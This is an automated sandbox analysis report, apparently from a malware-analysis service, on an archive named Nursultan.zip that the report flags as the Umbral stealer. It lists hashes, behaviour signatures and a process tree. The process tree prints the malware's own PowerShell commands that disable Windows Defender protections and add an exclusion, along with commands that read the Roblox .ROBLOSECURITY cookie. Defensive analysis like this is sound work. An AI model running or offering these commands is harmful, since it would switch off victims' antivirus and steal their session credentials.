Overview

overview

10

Static

static

3

Nursultan.zip

windows10-ltsc 2021-x64

Analysis

  • max time kernel
    465s
  • max time network
    467s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    02-11-2024 18:58

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Nursultan.zip

  • Size

    217KB

  • MD5

    86fe8178d8df9d23afbbf47e5b21f5f0

  • SHA1

    106ba426a9739b6320724737cffaa14b5e1d2f2c

  • SHA256

    c503ac57785984abc5440e07c0fa2c16eb83b33b56fcdd232797285e712a8fb7

  • SHA512

    6216d9a7dd091a8349a4706e3440e273b17c1a833845973056ef78f3a7845dbbd1d8fccfd57cd508c0a80ba548b607b1bfdffc4594ced7176d5a080370fd31a5

  • SSDEEP

    6144:zAW8AvR3auno/wHVB5ntv+Vmnu4k6WqEgs6Qe:XRRoCVHR+Mnu4sqHs6d

Score
10/10
umbraldiscoveryexecutionpersistencespywarestealerupx

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 5 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Nursultan.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1112
  • C:\Users\Admin\Desktop\Nursultan.exe
    "C:\Users\Admin\Desktop\Nursultan.exe"
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2364
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4152
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4340
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3964
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2580
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        • Suspicious behavior: EnumeratesProcesses
        PID:4492
    • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
      "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
      2⤵
      • Executes dropped EXE
      PID:2904
  • C:\Users\Admin\Desktop\Nursultan.exe
    "C:\Users\Admin\Desktop\Nursultan.exe"
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3720
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2740
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1028
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2244
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3792
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        • Suspicious behavior: EnumeratesProcesses
        PID:1732
    • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
      "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
      2⤵
      • Executes dropped EXE
      PID:904
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3208
  • C:\Users\Admin\Desktop\Nursultan.exe
    "C:\Users\Admin\Desktop\Nursultan.exe"
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:3724
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:3184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:1104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
          PID:2616
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          3⤵
            PID:4208
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            3⤵
              PID:1028
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              3⤵
                PID:628
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                3⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3092
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                3⤵
                • Detects videocard installed
                PID:2492
            • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
              "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
              2⤵
              • Executes dropped EXE
              PID:4452
          • C:\Users\Admin\Desktop\Nursultan.exe
            "C:\Users\Admin\Desktop\Nursultan.exe"
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:384
            • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
              "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
              2⤵
              • Executes dropped EXE
              PID:3164
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                3⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2224
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                3⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3880
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                3⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4152
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                3⤵
                  PID:1364
                • C:\Windows\System32\Wbem\wmic.exe
                  "wmic.exe" os get Caption
                  3⤵
                    PID:1720
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" computersystem get totalphysicalmemory
                    3⤵
                      PID:4892
                    • C:\Windows\System32\Wbem\wmic.exe
                      "wmic.exe" csproduct get uuid
                      3⤵
                        PID:3304
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2272
                      • C:\Windows\System32\Wbem\wmic.exe
                        "wmic" path win32_VideoController get name
                        3⤵
                        • Detects videocard installed
                        PID:4580
                    • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
                      "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:2400
                  • C:\Users\Admin\Desktop\Nursultan.exe
                    "C:\Users\Admin\Desktop\Nursultan.exe"
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:2372
                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:3076
                    • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
                      "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:1104
                  • C:\Users\Admin\Desktop\Nursultan.exe
                    "C:\Users\Admin\Desktop\Nursultan.exe"
                    1⤵
                    • Executes dropped EXE
                    PID:2932
                  • C:\Users\Admin\Desktop\Nursultan.exe
                    "C:\Users\Admin\Desktop\Nursultan.exe"
                    1⤵
                    • Executes dropped EXE
                    PID:4444
                  • C:\Users\Admin\Desktop\Nursultan.exe
                    "C:\Users\Admin\Desktop\Nursultan.exe"
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:3624
                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:3240
                    • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
                      "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:3600
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                    • Checks SCSI registry key(s)
                    PID:3912
                  • C:\Windows\System32\rundll32.exe
                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    1⤵
                      PID:1868
                    • C:\Windows\SysWOW64\DllHost.exe
                      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                      1⤵
                      • System Location Discovery: System Language Discovery
                      PID:652
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                      1⤵
                      • Checks processor information in registry
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious behavior: AddClipboardFormatListener
                      PID:452
                    • C:\Users\Admin\Desktop\Nursultan.exe
                      "C:\Users\Admin\Desktop\Nursultan.exe"
                      1⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      PID:3052
                      • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:3808
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                          3⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4580
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                          3⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1448
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                          3⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1540
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                          3⤵
                            PID:1076
                          • C:\Windows\System32\Wbem\wmic.exe
                            "wmic.exe" os get Caption
                            3⤵
                              PID:4016
                            • C:\Windows\System32\Wbem\wmic.exe
                              "wmic.exe" computersystem get totalphysicalmemory
                              3⤵
                                PID:3812
                              • C:\Windows\System32\Wbem\wmic.exe
                                "wmic.exe" csproduct get uuid
                                3⤵
                                  PID:2400
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:1588
                                • C:\Windows\System32\Wbem\wmic.exe
                                  "wmic" path win32_VideoController get name
                                  3⤵
                                  • Detects videocard installed
                                  PID:1184
                              • C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe
                                "C:\Users\Admin\AppData\Local\Temp\Mintex Recode.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:4256
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                              1⤵
                              • Drops file in Windows directory
                              • Enumerates system info in registry
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              PID:2044
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc430ccc40,0x7ffc430ccc4c,0x7ffc430ccc58
                                2⤵
                                  PID:3592
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1936 /prefetch:2
                                  2⤵
                                    PID:4180
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2208 /prefetch:3
                                    2⤵
                                      PID:4628
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2492 /prefetch:8
                                      2⤵
                                        PID:1984
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3148 /prefetch:1
                                        2⤵
                                          PID:2164
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3180 /prefetch:1
                                          2⤵
                                            PID:2872
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4584 /prefetch:1
                                            2⤵
                                              PID:2200
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3700,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4488 /prefetch:8
                                              2⤵
                                                PID:1672
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4520 /prefetch:8
                                                2⤵
                                                  PID:4760
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4876 /prefetch:8
                                                  2⤵
                                                    PID:1060
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5056 /prefetch:8
                                                    2⤵
                                                      PID:4108
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5148,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5108 /prefetch:1
                                                      2⤵
                                                        PID:3848
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3336,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3200 /prefetch:1
                                                        2⤵
                                                          PID:4760
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5220,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3264 /prefetch:1
                                                          2⤵
                                                            PID:4632
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5288,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4512 /prefetch:1
                                                            2⤵
                                                              PID:1628
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5268,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5180 /prefetch:1
                                                              2⤵
                                                                PID:1424
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5416,i,12651756855233891470,1724981428867324284,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5248 /prefetch:1
                                                                2⤵
                                                                  PID:2544
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
